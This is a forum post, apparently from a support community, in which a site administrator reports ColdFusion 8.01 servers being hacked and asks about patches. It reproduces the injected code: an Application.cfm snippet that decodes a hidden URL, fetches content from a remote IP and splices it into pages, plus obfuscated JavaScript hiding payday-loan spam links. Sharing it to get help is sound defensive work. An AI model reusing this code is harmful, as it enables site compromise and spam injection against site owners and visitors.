1 2 Previous Next 39 Replies Latest reply on Sep 22, 2013 3:03 PM by Cenn Raven

    CF8.01 hacked.  Need info on patches


      Yesterday some of our hosted sites were hacked using code pasted below.  We're running CF 8.01 and I'm wondering if there is a cumulative secutity patch that we can apply or If I should just apply every security patch that I can find.  I noticed that this particular vulnerability was patched for CF9 and 10 about six weeks ago.


      Here's the hack:


      1. Application.cfm

      <cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><cfsavecontent variable="paga"><CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">

      <cfset mmy = cfhttp.FileContent><cfoutput>




      <CFHTTP METHOD = "Get" URL = "#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">

      <cfset cfs = cfhttp.FileContent>

      <cfif (FindNoCase("</div>",paga) GT 0)>

      <cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")>

      <cfelseif (FindNoCase("</table>",paga) GT 0)>

      <cfset paga = replace(paga, "</table>", "</table>#cfs#", "one")>

      <cfelseif (FindNoCase("</a>",paga) GT 0)>

      <cfset paga = replace(paga, "</a>", "</a>#cfs#", "one")>


      <cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>







      <cffunction name="hSWaawe"> 

      <cfargument name="HxzcGlk">

      <cfset Ypg = ToString(ToBinary(HxzcGlk))>

      <cfreturn Ypg>




      1. Index.htm





          <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.thehiltonorlando.com/">








            <a href="http://www.thehiltonorlando.com/">This page has moved.  Please click here if you are not automatically redirected in a moment...</a><script language="JavaScript">function zdrViewState()


      var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','99779188 90','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];




      t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}zdrViewState();





      <p class="zdroq">

      Most of the time, the borrower would <a href="http://www.paydayloans-online-uk.co.uk/" title="Payday">payday</a> be the one jeopardized. Applying to various payday loan sites could create suspicion to the lender <a href="http://payday-loans-fts.co.uk/" title="Payday Loans">payday loans</a> and this could make the approval process unnecessarily burdening. Having a checking account is also a <a href="http://best-rates-payday-loans.co.uk/" title="Http://best-rates-payday-loans.co.uk/">http://best-rates-payday-loans.co.uk/</a> must. They would also need this in order to withdraw money from your account when the payment is <a href="http://bad-credit-payday.co.uk/" title="Payday Loans Bad Credit">payday loans bad credit</a> due. In the long run, you would see that they have high interest rates that would be equivalent to wasting your <a href="http://payday-loans-eng.co.uk/" title="Payday Loans Uk">payday loans uk</a> money. </p>





      Thanks in advance.



        1 2 Previous Next